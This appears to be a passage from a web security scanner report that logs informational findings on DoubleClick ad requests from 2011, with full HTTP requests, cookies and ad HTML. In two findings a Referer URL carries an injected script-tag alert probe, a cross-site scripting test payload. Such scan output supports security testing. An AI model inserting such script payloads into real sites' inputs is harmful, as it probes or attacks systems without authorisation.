http://ad.doubleclick.net/adi/amzn.us.audienceextension/;cid=sedeja300x250audex;sz=300x250;click=http://bes-clck.com/c?i=1$AgAAAAAAAAADAAAAAAAAAAIAAAAAylA8k.bb5AUnXzPUmDQ4pWhP.NLzf190otuO9oYtLJ3xt7kPJegyvVqcGEM8lIEoxlM56vZGrjmSKhkiVLXR0HKKCFCIPrh99zh21X6AlFcdKdtYtUDIlIzgc6-9nHrFoGbZ4TySWdy06tQ9FWfAp47TxNs-ZbkiKPTtjFe1iv642tcmxri88y06uSh8j7mVBq-.v7bU7xqr.PPmNVJAvxDJ5CWAs1eKMg-BWDVbhXWnUHXq9QHBj7xuO1Ti.paX-c7tn7ZTATmV.aijuQt0Ffvujzu7NvGOtGJXJCQ1Z7JolmGXRHuybJGXTXHLFYR2.aYwIh8lZMhNz.SESxO1zW9Nn7VdF9xnxAJAyuWjhN5x8.bxNTtQm69sckKC2WkjdBA-j50D1K.E97lOLhqdyXv6xUgEOw34Ld.vwlBAhT99OSVFvKazcHQJs8yFMob.GJEJ6t47IwkSiFruXXulSGeserxL1Rt0bbzYnU.qf8sOFJtbblyiZ1NgExM8kJYNIqPQBkzoczvQwMuZHD.hlE4SS48A9aQUtDHuV0Hkd3hoEuFtjYY9Axu94BxMydOlIW9t7vTP86mOkNqqeSVS.aawb1hJsVWoPuRavDxQREjqYQc-1Q-Y2yr24ny0pDgE8KCVzXV9XuMmQfl8oUef4TKyYFg9Wyk8x8AFScjbxHvOwdY9OuASN25z7BXPXs0hwgmGf36-H196hX5Izgz3lBKNGjCVAtAbgjXiFgTbkELA1Wjc68TbXmkPiz8ZZLz3PgFTgoRcN5OkP8IhW5I1A0V67fZ1bfywXlcScLyZd0SEUwNt&d=;ord=4,241,713,230,325,361,860?

The response contains the following links to other domains:

http://g-ecx.images-amazon.com/images/G/01/SEHR/DE_300X250_110509_V1_failsafe2.jpg
http://www.amazon.com/gp/dra/info?pn=1&pg=daae&pp=cs,mr,fnp,MMyyeGTwtukhXfSzigkUfPZgoY4%3D

Request

GET /adi/amzn.us.audienceextension/;cid=sedeja300x250audex;sz=300x250;click=http://bes-clck.com/c?i=1$AgAAAAAAAAADAAAAAAAAAAIAAAAAylA8k.bb5AUnXzPUmDQ4pWhP.NLzf190otuO9oYtLJ3xt7kPJegyvVqcGEM8lIEoxlM56vZGrjmSKhkiVLXR0HKKCFCIPrh99zh21X6AlFcdKdtYtUDIlIzgc6-9nHrFoGbZ4TySWdy06tQ9FWfAp47TxNs-ZbkiKPTtjFe1iv642tcmxri88y06uSh8j7mVBq-.v7bU7xqr.PPmNVJAvxDJ5CWAs1eKMg-BWDVbhXWnUHXq9QHBj7xuO1Ti.paX-c7tn7ZTATmV.aijuQt0Ffvujzu7NvGOtGJXJCQ1Z7JolmGXRHuybJGXTXHLFYR2.aYwIh8lZMhNz.SESxO1zW9Nn7VdF9xnxAJAyuWjhN5x8.bxNTtQm69sckKC2WkjdBA-j50D1K.E97lOLhqdyXv6xUgEOw34Ld.vwlBAhT99OSVFvKazcHQJs8yFMob.GJEJ6t47IwkSiFruXXulSGeserxL1Rt0bbzYnU.qf8sOFJtbblyiZ1NgExM8kJYNIqPQBkzoczvQwMuZHD.hlE4SS48A9aQUtDHuV0Hkd3hoEuFtjYY9Axu94BxMydOlIW9t7vTP86mOkNqqeSVS.aawb1hJsVWoPuRavDxQREjqYQc-1Q-Y2yr24ny0pDgE8KCVzXV9XuMmQfl8oUef4TKyYFg9Wyk8x8AFScjbxHvOwdY9OuASN25z7BXPXs0hwgmGf36-H196hX5Izgz3lBKNGjCVAtAbgjXiFgTbkELA1Wjc68TbXmkPiz8ZZLz3PgFTgoRcN5OkP8IhW5I1A0V67fZ1bfywXlcScLyZd0SEUwNt&d=;ord=4,241,713,230,325,361,860? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4092
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:02:09 GMT
Expires: Mon, 13 Jun 2011 11:02:09 GMT
Discarded: true

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<head>
<style type="text/css">
.style1 {
border-width: 0;
}

...[SNIP]...
<map name="FPMap0" id="FPMap0">
<area href="http://www.amazon.com/gp/dra/info?pn=1&pg=daae&pp=cs,mr,fnp,MMyyeGTwtukhXfSzigkUfPZgoY4%3D" shape="rect" target="_blank" coords="0, 0, 41, 18">
<area href="http://ad.doubleclick.net/click%3Bh%3Dv8/3b25/f/369/%2a/b%3B241929981%3B0-0%3B1%3B57568802%3B4307-300/250%3B42584920/42602707/1%3B%3B%7Esscs%3D%3fhttp://bes-clck.com/c?i=1$AgAAAAAAAAADAAAA
...[SNIP]...
</map>
<img src="http://g-ecx.images-amazon.com/images/G/01/SEHR/DE_300X250_110509_V1_failsafe2.jpg" width="300" height="250" usemap="#FPMap0" class="style1"><a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3b25/f/369/%2a/b%3B241929981%3B0-0%3B1%3B57568802%3B4307-300/250%3B42584920/42602707/1%3B%3B%7Esscs%3D%3fhttp://bes-clck.com/c?i=1$AgAAAAAAAAADAAAAAAAA
...[SNIP]...

18.33. http://ad.doubleclick.net/adi/x1.dt/dt2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/x1.dt/dt2

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/x1.dt/dt2;sz=1x1;ord=1234443?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2619061/1x1.GIF

Request

GET /adi/x1.dt/dt2;sz=1x1;ord=1234443? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFCBFAEAAAAAdIsUAQAAAABZjBQBAAAAAN6XFAEAAAAA35cUAQAAAACbPexBAAAAAAAAFEAAAAAAAAAAADPOAAAAAAAAAAAAAAAAAAAzzgAAAAAAACQAAAAAAAAAN2FkYzRkMGUtOTlkMC00YTE2LWI2NjYtYzA4YmE2NWFjZDg2AAAAAAAAAAAUAAAAAAAAAEFHLTAwMDAwMDAxMzg5MzU4NTU0DwAAAAAAAAAxNzMuMTkzLjIxNC4yNDMGAAAAAAAAADcyOHg5MEIAAAAAAAAAaHR0cDovL3Nwb3J0ZGZ3LmNvbS8yMDExLzA2LzEzLzEwLW9ic2VydmF0aW9ucy1kYWxsYXMtbWF2cy1maW5hbHMvDgAAAAAAAAA0NDleMTk1XjIwOTk4NgAAAAAAAAAABgAAABwAAAAAAAYAAAAAAAAASUZSQU1FAAEADO71TQAAAAA=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 404
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:08:06 GMT
Expires: Mon, 13 Jun 2011 11:08:06 GMT
Discarded: true

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/a;241702843;0-0;0;63190541;31-1/1;35213258/35231076/1;;~sscs=%3fhttp://a.com"><img src="http://s0.2mdn.net/viewad/2619061/1x1.GIF" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

18.34. http://ad.doubleclick.net/adi/x1.dt/dt2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/x1.dt/dt2

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/x1.dt/dt2;sz=1x1;ord=1234443?

The response contains the following links to other domains:

http://adadvisor.net/adscores/g.pixel?sid=9297587126&_duid=910903057632460979
http://load.exelator.com/load/?p=104&g=050&ssv_duid=910903057632460979
http://r.nexac.com/e/getdata.xgi?dt=br&pkey=vrie89u2mpteq&ru=http://d.xp1.ru4.com/meta%3f_o%3d65121%26_t%3ddx%26ssv_duid%3d910903057632460979%26ssv_dx_1%3d<na_da>%26ssv_dx_2%3d<na_mp>%26ssv_dx_3%3d<na_id>

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 613
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:01:37 GMT
Expires: Mon, 13 Jun 2011 11:01:37 GMT
Discarded: true

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><img src="http://adadvisor.net/adscores/g.pixel?sid=9297587126&_duid=910903057632460979" width=1 height=1 />
<img src="http://r.nexac.com/e/getdata.xgi?dt=br&pkey=vrie89u2mpteq&ru=http://d.xp1.ru4.com/meta%3f_o%3d65121%26_t%3ddx%26ssv_duid%3d910903057632460979%26ssv_dx_1%3d<na_da>%26ssv_dx_2%3d<na_mp>%26ssv_dx_3%3d<na_id>" height=1 width=1>
<script type="text/javascript" src="http://load.exelator.com/load/?p=104&g=050&ssv_duid=910903057632460979"></script>
...[SNIP]...

18.35. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/x1.rtb/fingerhut/mass/rmkt

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=5047475?

The response contains the following links to other domains:

http://s0.2mdn.net/1887566/reva728x90_grillz.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=5047475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFCBFAEAAAAAdIsUAQAAAABZjBQBAAAAAN6XFAEAAAAA35cUAQAAAACbPexBAAAAAAAAFEAAAAAAAAAAADPOAAAAAAAAAAAAAAAAAAAzzgAAAAAAACQAAAAAAAAAN2FkYzRkMGUtOTlkMC00YTE2LWI2NjYtYzA4YmE2NWFjZDg2AAAAAAAAAAAUAAAAAAAAAEFHLTAwMDAwMDAxMzg5MzU4NTU0DwAAAAAAAAAxNzMuMTkzLjIxNC4yNDMGAAAAAAAAADcyOHg5MEIAAAAAAAAAaHR0cDovL3Nwb3J0ZGZ3LmNvbS8yMDExLzA2LzEzLzEwLW9ic2VydmF0aW9ucy1kYWxsYXMtbWF2cy1maW5hbHMvDgAAAAAAAAA0NDleMTk1XjIwOTk4NgAAAAAAAAAABgAAABwAAAAAAAYAAAAAAAAASUZSQU1FAAEADO71TQAAAAA=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4760
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:08:09 GMT
Expires: Mon, 13 Jun 2011 11:08:09 GMT
Discarded: true

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>


<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
f%2fwww.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dgrillz%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dflash%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-flash"><img src="http://s0.2mdn.net/1887566/reva728x90_grillz.jpg" border="0" alt="" ></a>
...[SNIP]...

18.36. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/x1.rtb/fingerhut/mass/rmkt

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bn.xp1.ru4.com/bclick?_f=ba80c6d3ee7a3c8edb827d9db39ffcd685104621&_o=15607&_eo=747979&_et=1307963580&_a=18121040&_s=0&_d=18123636&_pm=747979&_pn=18126789&redirect=;u=18126789;ord=7743125?

The response contains the following links to other domains:

http://s0.2mdn.net/1887566/728x90_aHairyGuy.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bn.xp1.ru4.com/bclick?_f=ba80c6d3ee7a3c8edb827d9db39ffcd685104621&_o=15607&_eo=747979&_et=1307963580&_a=18121040&_s=0&_d=18123636&_pm=747979&_pn=18126789&redirect=;u=18126789;ord=7743125? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=&_wp=74273736E1DAEA47&_nv=1&_CDbg=18121040&_eo=747979&_sm=268435456&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFCBFAEAAAAAdIsUAQAAAADFlxQBAAAAAN6XFAEAAAAA35cUAQAAAACbPexBAAAAAAAAFEAAAAAAAAAAAMtpCwAAAAAAAAAAAAAAAADLaQsAAAAAACgAAAAAAAAAYmE4MGM2ZDNlZTdhM2M4ZWRiODI3ZDlkYjM5ZmZjZDY4NTEwNDYyMQAAAAAAAAAAFAAAAAAAAABBRy0wMDAwMDAwMTM4OTM1ODU1NA8AAAAAAAAAMTczLjE5My4yMTQuMjQzBgAAAAAAAAA3Mjh4OTAkAAAAAAAAAGh0dHA6Ly9zcG9ydGRmdy5jb20vYWJvdXRjb250YWN0LXVzLwcAAAAAAAAAMTM0NjReXgIAAAAAAAAAMTkGAAAAHAAAAAAAAAAAAAAAAAAAAAC88PVNAAAAAA==
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4763
Date: Mon, 13 Jun 2011 11:13:02 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>


<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3Ddefault%26CTMedia%3Dx1%26CTProgType%3Dmass%26CTUnitSize%3D728x90%26CTTestGrp%3Dflash%26cm_mmc%3Dx1-_-mass-_-728x90-_-flash"><img src="http://s0.2mdn.net/1887566/728x90_aHairyGuy.jpg" border="0" alt="" ></a>
...[SNIP]...

18.37. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/x1.rtb/fingerhut/mass/rmkt

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=5047475?

The response contains the following links to other domains:

http://s0.2mdn.net/1887566/frugal_728x90.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=5047475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFCBFAEAAAAAdIsUAQAAAABZjBQBAAAAAN6XFAEAAAAA35cUAQAAAACbPexBAAAAAAAAFEAAAAAAAAAAADPOAAAAAAAAAAAAAAAAAAAzzgAAAAAAACQAAAAAAAAAN2FkYzRkMGUtOTlkMC00YTE2LWI2NjYtYzA4YmE2NWFjZDg2AAAAAAAAAAAUAAAAAAAAAEFHLTAwMDAwMDAxMzg5MzU4NTU0DwAAAAAAAAAxNzMuMTkzLjIxNC4yNDMGAAAAAAAAADcyOHg5MEIAAAAAAAAAaHR0cDovL3Nwb3J0ZGZ3LmNvbS8yMDExLzA2LzEzLzEwLW9ic2VydmF0aW9ucy1kYWxsYXMtbWF2cy1maW5hbHMvDgAAAAAAAAA0NDleMTk1XjIwOTk4NgAAAAAAAAAABgAAABwAAAAAAAYAAAAAAAAASUZSQU1FAAEADO71TQAAAAA=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4784
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:01:37 GMT
Expires: Mon, 13 Jun 2011 11:01:37 GMT
Discarded: true

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>


<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dfrugalmonster%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dflash%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-flash"><img src="http://s0.2mdn.net/1887566/frugal_728x90.jpg" border="0" alt="" ></a>
...[SNIP]...

18.38. http://ad.doubleclick.net/adj/N2949.280881.BUZZMEDIA/B5492484.2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N2949.280881.BUZZMEDIA/B5492484.2

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/N2949.280881.BUZZMEDIA/B5492484.2;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b25/3/0/%2a/o%3B240944844%3B0-0%3B1%3B46096148%3B4307-300/250%3B42253770/42271557/1%3B%3B~okv%3D%3Bpos%3D300a%3Btile%3D2%3Bsz%3D300x250%2C300x600%3Bkw%3Dnewmoon%2Cashleygreene%2Ceclipse%2Celizabethreaser%3Bceleb%3Dtaylorlautner%3Bdcopt%3Dist%3B~aopt%3D2/1/ff/0%3B~sscs%3D%3f;ord=7788419?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2703878/Havaianas_MYOH_Custom+Sandals_Media6+300x250_jpg.jpg

Request

GET /adj/N2949.280881.BUZZMEDIA/B5492484.2;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b25/3/0/%2a/o%3B240944844%3B0-0%3B1%3B46096148%3B4307-300/250%3B42253770/42271557/1%3B%3B~okv%3D%3Bpos%3D300a%3Btile%3D2%3Bsz%3D300x250%2C300x600%3Bkw%3Dnewmoon%2Cashleygreene%2Ceclipse%2Celizabethreaser%3Bceleb%3Dtaylorlautner%3Bdcopt%3Dist%3B~aopt%3D2/1/ff/0%3B~sscs%3D%3f;ord=7788419? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 649
Date: Mon, 13 Jun 2011 11:32:38 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/4/13c/%2a/d;240928613;0-0;0;63553212;4307-300/250;42135910/42153697/1;;~sscs=%3fhttp://ad.doubleclick.net/click%3Bh%3
...[SNIP]...
a%3Btile%3D2%3Bsz%3D300x250%2C300x600%3Bkw%3Dnewmoon%2Cashleygreene%2Ceclipse%2Celizabethreaser%3Bceleb%3Dtaylorlautner%3Bdcopt%3Dist%3B~aopt%3D2/1/ff/0%3B~sscs%3D%3fhttp://us.havaianas.com/MYOH.html"><img src="http://s0.2mdn.net/viewad/2703878/Havaianas_MYOH_Custom+Sandals_Media6+300x250_jpg.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

18.39. http://ad.doubleclick.net/adj/N2949.280881.BUZZMEDIA/B5492484.3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N2949.280881.BUZZMEDIA/B5492484.3

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/N2949.280881.BUZZMEDIA/B5492484.3;sz=728x90;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b25/3/0/%2a/s%3B240945205%3B0-0%3B1%3B46096148%3B3454-728/90%3B42253783/42271570/1%3B%3B~okv%3D%3Bpos%3D728b%3Btile%3D3%3Bsz%3D728x90%3Bkw%3Dnewmoon%2Cashleygreene%2Ceclipse%2Celizabethreaser%3Bceleb%3Dtaylorlautner%3B~aopt%3D2/1/ff/0%3B~sscs%3D%3f;ord=7794278?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2703878/Havaianas_MYOH_Custom+Sandals_Media6+728x90_jpg.jpg

Request

GET /adj/N2949.280881.BUZZMEDIA/B5492484.3;sz=728x90;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b25/3/0/%2a/s%3B240945205%3B0-0%3B1%3B46096148%3B3454-728/90%3B42253783/42271570/1%3B%3B~okv%3D%3Bpos%3D728b%3Btile%3D3%3Bsz%3D728x90%3Bkw%3Dnewmoon%2Cashleygreene%2Ceclipse%2Celizabethreaser%3Bceleb%3Dtaylorlautner%3B~aopt%3D2/1/ff/0%3B~sscs%3D%3f;ord=7794278? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 621
Date: Mon, 13 Jun 2011 11:32:46 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/4/122/%2a/g;241001146;0-0;0;63553213;3454-728/90;42135929/42153716/1;;~sscs=%3fhttp://ad.doubleclick.net/click%3Bh%3D
...[SNIP]...
%3B%3B~okv%3D%3Bpos%3D728b%3Btile%3D3%3Bsz%3D728x90%3Bkw%3Dnewmoon%2Cashleygreene%2Ceclipse%2Celizabethreaser%3Bceleb%3Dtaylorlautner%3B~aopt%3D2/1/ff/0%3B~sscs%3D%3fhttp://us.havaianas.com/MYOH.html"><img src="http://s0.2mdn.net/viewad/2703878/Havaianas_MYOH_Custom+Sandals_Media6+728x90_jpg.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

18.40. http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.11

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.11;sz=728x90;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUFng8aJLBZKJyWoaUyNqjOVxerAdnZW8sdXNhLHQsMTMwNzk2NDAxMjgxMCxjLDM0NTc2OCxwYyw3NzQ4MyxhYywxNjk5NzYsbyxOMC1TMCxsLDYyMTk1LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVjdWFkUTg1dE1FcUMuTVg2ZXFWMTU3Y1F2SkpuWlc4c2RYTmhMSFFzTVRNd056azJOREF3T0RFM01TeGpMRE0wTmpRMk55eHdZeXczT1Rjd01DeGhZeXd4TnpjNU9URXNieXhPTUMxVE1DeHNMRFkwTURVMExIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDBGQlFVRkJRVUZCUVVWQlFVRkJRVUZCUVVGQlVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSVDFRNVQxWjNVRnB3YTB4ZllYbEVSMjkyUW1SNU9XczRkbFpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU1RsQlZVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVZaM2QwSkJaMVZEUVZGUlFVRkJRVUZQVW04eVlVRkJRVUZCUVM0dlkyNWtQU0ZpZDFoTVRGRnF